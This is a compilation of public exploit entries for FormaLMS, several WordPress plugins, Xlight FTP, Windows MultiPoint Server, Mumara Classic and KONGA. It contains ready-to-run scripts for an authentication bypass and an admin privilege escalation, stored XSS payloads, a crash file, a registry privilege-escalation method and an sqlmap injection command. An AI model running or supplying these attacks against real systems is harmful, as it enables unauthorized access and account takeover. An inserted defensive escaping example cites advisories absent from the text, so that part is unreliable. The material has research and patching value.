FormaLMS 2.4.4 - Authentication Bypass
# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
# Google Dork: inurl:index.php?r=adm/
# Date: 2021-11-10
# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
# Vendor Homepage: https://formalms.org
# Software Link: https://formalms.org
# Version: <= 2.4.4
# Tested on: Linux
# CVE : CVE-2021-43136
# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain valid access to the platform.
# Analysis: https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
# Nuclei template: https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml

#!/usr/bin/env python
"""
The following exploit generates two URLs: one computed with the fixed default value of the "secret", one with an empty secret.
For a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled.
"""
import sys
import time
import hashlib

# Default value of the SSO secret (the "evil default value" of the analysis above)
secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"


def help():
    print(f"Usage: {sys.argv[0]} username target_url")
    sys.exit()


if len(sys.argv) < 3:
    help()

user, url = (sys.argv[1], sys.argv[2])
t = str(int(time.time()) + 5000)

# Token = uppercase MD5 of "user,time,secret"
token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
print(f"URL with default secret: {final_url}")

token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
print(f"URL with empty secret: {final_url}")
-
WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)
# Date: 11/11/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: http://www.wpsymposiumpro.com/
# Software Link: https://wordpress.org/plugins/wp-symposium-pro/
# Version: 2021.10
# Tested on : Windows 10

#Description: WP Symposium Pro version 2021.10 is vulnerable to stored cross-site scripting because the "name" field of a newly added forum is not sanitised.

#Poc:

POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test
----------------------------------------------------------------------------------

## After adding the new forum, click the created forum and the pop-up appears on the screen.
-
WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)
# Date: 11/12/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://accesspressthemes.com/
# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
# Version: 1.8.2
# Tested on : Windows 10

#Poc:
1. Install the latest WordPress.
2. Install and activate AccessPress Social Icons 1.8.2.
3. Open the plugin in the left menu and go to the "Add New" page. Click "Choose icon individually" and fill in the other fields.
4. Enter the JavaScript payload below into the 'icon title' field and click "Add Icon to list".
   <img src=x onerror=confirm('xss')>
5. The payload is stored in the database and the alert is shown on the screen.
-
Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)
# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-12
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link: https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.1
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC)

# Steps to reproduce:
# 1. - Download and install Xlight FTP
# 2. - Run the python script; it creates the exploit.txt file.
# 3. - Open Xlight FTP 3.9.3.1
# 4. - "File and Directory -> Access Control List -> Setup -> Added users list directories"
# 5. - Go to "Specify file or directory name applied", "Specify username applied to" or "Specify groupname applied"
# 6. - Go to Setup -> Add -> Enter new Item, and paste the characters
# 7. - Crashed

#!/usr/bin/python
exploit = 'A' * 550

try:
    file = open("exploit.txt", "w")
    file.write(exploit)
    file.close()
    print("POC is created")
except:
    print("POC not created")
-
Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation
# Exploit Title: Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation
# Date: 11/11/2021
# Exploit Author: it
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/pt-br/download/details.aspx?id=8518
# Version: Version 6.1 Build 7601 Service Pack 1
# Tested on: Microsoft Windows MultiPoint Server 2011 - English Version

Description
Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnscache

Vulnerable: Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnscache
Vulnerability Type: Privilege Escalation
Tested on: Microsoft Windows MultiPoint Server 2011 - Version 6.1 Build 7601 Service Pack 1
Language OS: English

The Vulnerability
Clément (itm4n) wrote a very useful permissions-checking tool for Windows that finds various misconfigurations that could allow a local attacker to elevate their privileges. On a typical Windows 7 and Server 2008 R2 machine, the tool found that all local users have write permissions on two registry keys:

HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper

These did not immediately seem exploitable, but Clément did the legwork and found that the Windows Performance Monitoring mechanism can be made to read from these keys and eventually load a DLL provided by the local attacker, and, to most everyone's surprise, not as the local user but as Local System.

In short, a local non-admin user on the computer creates a Performance subkey under one of the above keys, populates it with a few values, and triggers performance data collection, which leads to a Local System WmiPrvSE.exe process loading the attacker's DLL and executing code from it.

About the original article: https://itm4n.github.io/windows-registry-rpceptmapper-eop/

I found that another version of Windows is also vulnerable, Windows MultiPoint Server 2011, which can affect customers using an extended license. I cannot say whether other unlisted versions are vulnerable besides the ones posted here.

How to reproduce
Compile the Perfusion exploit in Visual Studio 2019: open the project, select the Release x64 configuration and build. The Microsoft Visual C++ Redistributable must be installed on Windows MultiPoint 2011 to run the exploit.

The exploit adds a Performance subkey under
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
with the values:
Library = name of your performance DLL
Open    = name of the Open function in your DLL
Collect = name of the Collect function in your DLL
Close   = name of the Close function in your DLL

It then writes the payload DLL and triggers performance data collection through WMI, so the DLL is loaded with SYSTEM permissions.

Tools and Exploit:
https://github.com/itm4n/PrivescCheck
Exploit: https://github.com/itm4n/Perfusion
-
Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
# Date: 2021-11-11
# Exploit Author: (v0yager) Shain Lakin
# Vendor Homepage: https://mumara.com
# Version: <= 2.93
# Tested on: CentOS 7

-==== Vulnerability ====-

An SQL injection vulnerability in license_update.php in Mumara Classic through 2.93 allows a remote unauthenticated attacker to execute arbitrary SQL commands via the license parameter.

-==== POC ====-

Using SQLMap:

sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql
-
WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
# Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
# Date: 20/08/2021
# Exploit Author: Davide Taraschi
# Vendor Homepage: https://wpschoolpress.com/
# Software Link: https://wpschoolpress.com/free-download/
# Version: up to 2.1.17 (not included)
# Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2
# CVE : CVE-2021-24664

# Description:
The plugin sanitises some fields with the WordPress built-in function sanitize_text_field(), but does not escape them before outputting them inside HTML attributes, resulting in stored Cross-Site Scripting issues. sanitize_text_field() strips HTML tags, so < and > cannot be used, but it does not escape characters like ", which lets an attacker break out of an HTML input tag's attribute and inject arbitrary JavaScript.

# PoC:
As admin,

- Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), tick the Absent box and put the following payload in the Reason:
  "style=animation-name:rotation onanimationstart=alert(/XSS/)//
  The XSS is triggered when adding another teacher attendance by clicking on the Add button

- Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason:
  " style=animation-name:rotation onanimationstart=alert(/XSS/)//
  The XSS is triggered when adding another attendance by clicking the 'Add/Update' button

- Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field':
  " autofocus onfocus=alert(/XSS/)//
  The XSS is triggered when editing the created Subject Mark (e.g. /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3)

- Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field:
  " autofocus onfocus=alert(/XSS/)//
  The XSS is triggered when editing the Subject

- Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name field:
  " autofocus onfocus=alert(/XSS/)//
  The XSS is triggered when editing the Exam

Note that some of these XSS issues can be triggered by a teacher (a medium-privileged user), but since WordPress sets its session cookies HttpOnly, stealing cookies with them is not possible.
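The point this advisory makes, that tag stripping is not output escaping and that the attribute context needs the quote escaped, applies just as well to the stored XSS advisories above it (the department-name, forum-name and icon-title cases, where the value lands between tags and nothing is escaped at all). The following is an added example written for this page, not code from WPSchoolPress or WordPress: a tag-stripping approximation of sanitize_text_field(), the two output contexts rendered unsafely and safely, and small checks that tell whether a payload broke out. The markup templates are assumptions; the two payloads are the advisories' own.

```python
import html
import re

TAG_RE = re.compile(r"<[^>]*>")

def sanitize_text_field_like(value):
    """Approximation of the tag stripping the advisory says the plugin relies on:
    tags disappear, quotes are untouched."""
    return TAG_RE.sub("", value).strip()

# Attribute context (WPSchoolPress): the value lands inside value="...".
def render_input_unsafe(value):
    return f'<input type="text" name="reason" value="{sanitize_text_field_like(value)}">'

def render_input_safe(value):
    # quote=True is what turns " into &quot; so the attribute cannot be closed early.
    return f'<input type="text" name="reason" value="{html.escape(value, quote=True)}">'

# Text context (department/forum/icon names): the value lands between tags.
def render_cell_unsafe(value):
    return f"<td>{value}</td>"

def render_cell_safe(value):
    return f"<td>{html.escape(value, quote=False)}</td>"

ATTR_PAYLOAD = '" autofocus onfocus=alert(/XSS/)//'   # WPSchoolPress payload
TEXT_PAYLOAD = '<svg/onload=alert(1)>'                # EDTMS payload

INPUT_RE = re.compile(r'<input type="text" name="reason" value="([^"]*)"(.*)>')

def attribute_broken_out(rendered):
    """True if the payload closed value="..." early and left extra attributes."""
    m = INPUT_RE.match(rendered)
    return m is not None and m.group(2).strip() != ""

def contains_tag(rendered_cell):
    inner = rendered_cell[len("<td>"):-len("</td>")]
    return TAG_RE.search(inner) is not None

if __name__ == "__main__":
    print("tag-stripped attr payload:", repr(sanitize_text_field_like(ATTR_PAYLOAD)))
    print("unsafe input:", render_input_unsafe(ATTR_PAYLOAD), attribute_broken_out(render_input_unsafe(ATTR_PAYLOAD)))
    print("safe input:  ", render_input_safe(ATTR_PAYLOAD), attribute_broken_out(render_input_safe(ATTR_PAYLOAD)))
    print("unsafe cell: ", render_cell_unsafe(TEXT_PAYLOAD), contains_tag(render_cell_unsafe(TEXT_PAYLOAD)))
    print("safe cell:   ", render_cell_safe(TEXT_PAYLOAD), contains_tag(render_cell_safe(TEXT_PAYLOAD)))
```

Tag stripping neutralises the <svg> payload but leaves the attribute payload untouched, because it contains no tag; only escaping for the context the value is written into (esc_attr() in WordPress terms for attributes, esc_html() for text) closes both.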
-
KONGA 0.14.9 - Privilege Escalation
# Exploit Title: KONGA 0.14.9 - Privilege Escalation
# Date: 10/11/2021
# Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)
# Vendor Homepage: https://github.com/pantsel/konga
# Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip
# Version: 0.14.9
# Tested on: Linux - Ubuntu 20.04.3 LTS (focal)

import requests
import json

urlkonga = "http://www.example.com:1337/"  # change to your konga address
identifier = "usernormalkonga"  # change user
password = "changeme"  # change password

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Content-Type": "application/json;charset=utf-8",
    "connection-id": "",
    "Origin": urlkonga,
    "Referer": urlkonga
}

# Log in as the low-privileged user and keep the issued token
url = urlkonga + "login"
data = {
    "identifier": identifier,
    "password": password
}
response = requests.post(url, json=data)
json_object = json.loads(response.text)
print("[+] Attack")
print("[+] Token " + json_object["token"])

# Update our own user record: the API accepts the "admin" flag from the client
url2 = urlkonga + "api/user/" + str(json_object["user"]["id"])
print("[+] Exploiting User ID " + str(json_object["user"]["id"]))
data2 = {
    "admin": "true",
    "passports": {
        "password": password,
        "protocol": "local"
    },
    "password_confirmation": password,
    "token": json_object["token"]
}
print("[+] Change Normal User to Admin")
response2 = requests.put(url2, headers=headers, json=data2)
print("[+] Success")